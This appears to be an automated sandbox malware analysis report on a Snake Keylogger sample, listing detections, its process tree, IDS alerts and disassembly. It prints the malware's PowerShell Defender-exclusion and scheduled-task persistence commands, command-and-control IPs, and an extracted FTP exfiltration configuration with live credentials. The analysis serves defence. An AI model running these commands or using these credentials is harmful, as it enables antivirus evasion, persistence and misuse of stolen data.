Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi-01.exe

Overview

General Information

Sample name:hesaphareketi-01.exe
Analysis ID:1550346
MD5:fb1ddd3d10ca671f437c6f2f3c9d6e57
SHA1:7bd24b6b4a1e30c7bd2ec0cfbe886021a902c912
SHA256:49917f413cbf883715a5f6e5a30cb13abafc693ec296751ba8b1bdbc3142e8c5
Tags:exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareketi-01.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: FB1DDD3D10CA671F437C6F2F3C9D6E57)
    • powershell.exe (PID: 5964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3152 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • WvaGpcFVX.exe (PID: 7304 cmdline: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe MD5: FB1DDD3D10CA671F437C6F2F3C9D6E57)
    • schtasks.exe (PID: 7552 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7636 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14826:$a1: get_encryptedPassword
      • 0x14b12:$a2: get_encryptedUsername
      • 0x14632:$a3: get_timePasswordChanged
      • 0x1472d:$a4: get_passwordField
      • 0x1483c:$a5: set_encryptedPassword
      • 0x15e60:$a7: get_logins
      • 0x15dc3:$a10: KeyLoggerEventArgs
      • 0x15a2e:$a11: KeyLoggerEventArgsEventHandler
      00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x19797:$x1: $%SMTPDV$
      • 0x18178:$x2: $#TheHashHere%&
      • 0x18124:$x3: %FTPDV$
      • 0x1986d:$x4: $%TelegramDv$
      • 0x15a2e:$x5: KeyLoggerEventArgs
      • 0x15dc3:$x5: KeyLoggerEventArgs
      • 0x19763:$m2: Clipboard Logs ID
      • 0x199bd:$m2: Screenshot Logs ID
      • 0x19acd:$m2: keystroke Logs ID
      • 0x19da7:$m3: SnakePW
      • 0x19995:$m4: \SnakeKeylogger\
      0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 33 entries
        SourceRuleDescriptionAuthorStrings
        10.2.WvaGpcFVX.exe.45999b0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          10.2.WvaGpcFVX.exe.45999b0.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            10.2.WvaGpcFVX.exe.45999b0.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12c26:$a1: get_encryptedPassword
            • 0x12f12:$a2: get_encryptedUsername
            • 0x12a32:$a3: get_timePasswordChanged
            • 0x12b2d:$a4: get_passwordField
            • 0x12c3c:$a5: set_encryptedPassword
            • 0x14260:$a7: get_logins
            • 0x141c3:$a10: KeyLoggerEventArgs
            • 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
            10.2.WvaGpcFVX.exe.45999b0.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19c06:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
            10.2.WvaGpcFVX.exe.45999b0.2.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x137de:$s1: UnHook
            • 0x137e5:$s2: SetHook
            • 0x137ed:$s3: CallNextHook
            • 0x137fa:$s4: _hook
            Click to see the 47 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 5964, ProcessName: powershell.exe
            Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 193.122.6.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7200, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 56815
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 5964, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe, ParentImage: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe, ParentProcessId: 7304, ParentProcessName: WvaGpcFVX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp", ProcessId: 7552, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", ProcessId: 3152, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 5964, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", ProcessId: 3152, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T17:02:46.299399+010028033053Unknown Traffic192.168.2.656834188.114.96.3443TCP
            2024-11-06T17:02:49.559832+010028033053Unknown Traffic192.168.2.656858188.114.96.3443TCP
            2024-11-06T17:02:51.072384+010028033053Unknown Traffic192.168.2.656868188.114.96.3443TCP
            2024-11-06T17:02:52.819631+010028033053Unknown Traffic192.168.2.656880188.114.96.3443TCP
            2024-11-06T17:02:54.797377+010028033053Unknown Traffic192.168.2.656891188.114.96.3443TCP
            2024-11-06T17:02:58.359771+010028033053Unknown Traffic192.168.2.656914188.114.96.3443TCP
            2024-11-06T17:03:01.692771+010028033053Unknown Traffic192.168.2.656931188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T17:02:44.333550+010028032742Potentially Bad Traffic192.168.2.656815193.122.6.16880TCP
            2024-11-06T17:02:45.536539+010028032742Potentially Bad Traffic192.168.2.656815193.122.6.16880TCP
            2024-11-06T17:02:47.224068+010028032742Potentially Bad Traffic192.168.2.656841193.122.6.16880TCP
            2024-11-06T17:02:48.224050+010028032742Potentially Bad Traffic192.168.2.656843193.122.6.16880TCP
            2024-11-06T17:02:48.817798+010028032742Potentially Bad Traffic192.168.2.656856193.122.6.16880TCP
            2024-11-06T17:02:50.288092+010028032742Potentially Bad Traffic192.168.2.656843193.122.6.16880TCP
            2024-11-06T17:02:52.005298+010028032742Potentially Bad Traffic192.168.2.656874193.122.6.16880TCP
            2024-11-06T17:02:53.997145+010028032742Potentially Bad Traffic192.168.2.656885193.122.6.16880TCP
            2024-11-06T17:02:55.724025+010028032742Potentially Bad Traffic192.168.2.656897193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T17:02:32.729019+010028455321Malware Command and Control Activity Detected192.168.2.65009450.31.176.10321TCP
            2024-11-06T17:02:32.729019+010028455321Malware Command and Control Activity Detected192.168.2.65011450.31.176.10321TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T17:03:05.137972+010028455351Malware Command and Control Activity Detected192.168.2.65010250.31.176.10334028TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeReversingLabs: Detection: 39%
            Source: hesaphareketi-01.exeReversingLabs: Detection: 39%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeJoe Sandbox ML: detected
            Source: hesaphareketi-01.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: hesaphareketi-01.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56827 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56857 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.6:56914 -> 188.114.96.3:443 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56922 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50124 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50167 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50125 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50181 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50270 version: TLS 1.2
            Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 072401D2h0_2_07240260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02B1FA39h9_2_02B1F778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02B1E61Fh9_2_02B1E431
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02B1EFA9h9_2_02B1E431
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_02B1D7F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06751011h9_2_06750D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067515D8h9_2_067511C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675D8C1h9_2_0675D618
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675E171h9_2_0675DEC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675EA21h9_2_0675E778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675B1A9h9_2_0675AF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675BA59h9_2_0675B7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675BEB1h9_2_0675BC08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675C761h9_2_0675C4B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06750751h9_2_067504A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675F729h9_2_0675F480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675D011h9_2_0675CD68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067515D8h9_2_06751506
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675DD19h9_2_0675DA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675B601h9_2_0675B358
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675E5C9h9_2_0675E320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675EE79h9_2_0675EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675C309h9_2_0675C060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067502F1h9_2_06750040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675F2D1h9_2_0675F028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675FB81h9_2_0675F8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675CBB9h9_2_0675C910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06750BB1h9_2_06750900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0675D469h9_2_0675D1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067515D8h9_2_067511B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067888EDh9_2_067885B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06786119h9_2_06785E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_06783676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06785CC1h9_2_06785A18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_0678FE02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06786571h9_2_067862C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06786E21h9_2_06786B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_06783360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_06783350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067869C9h9_2_06786720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067872A2h9_2_06786FF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067876F9h9_2_06787450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067802E9h9_2_06780040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06780B99h9_2_067808F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06787B51h9_2_067878A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06780741h9_2_06780498
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06788401h9_2_06788158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 067853E9h9_2_06785140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06787FA9h9_2_06787D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06785869h9_2_067855C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05371011h16_2_05370D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 053715D8h16_2_053711C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537FB81h16_2_0537F8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537CBB9h16_2_0537C910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 053715D8h16_2_05371506
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05370BB1h16_2_05370900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537D011h16_2_0537CD68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 053715D8h16_2_053711B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537D469h16_2_0537D1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537F2D1h16_2_0537F028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537BEB1h16_2_0537BC08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537C309h16_2_0537C060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 053702F1h16_2_05370040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537C761h16_2_0537C4B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05370751h16_2_053704A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537F729h16_2_0537F480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537E5C9h16_2_0537E320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537B1A9h16_2_0537AF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537EA21h16_2_0537E778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537B601h16_2_0537B358
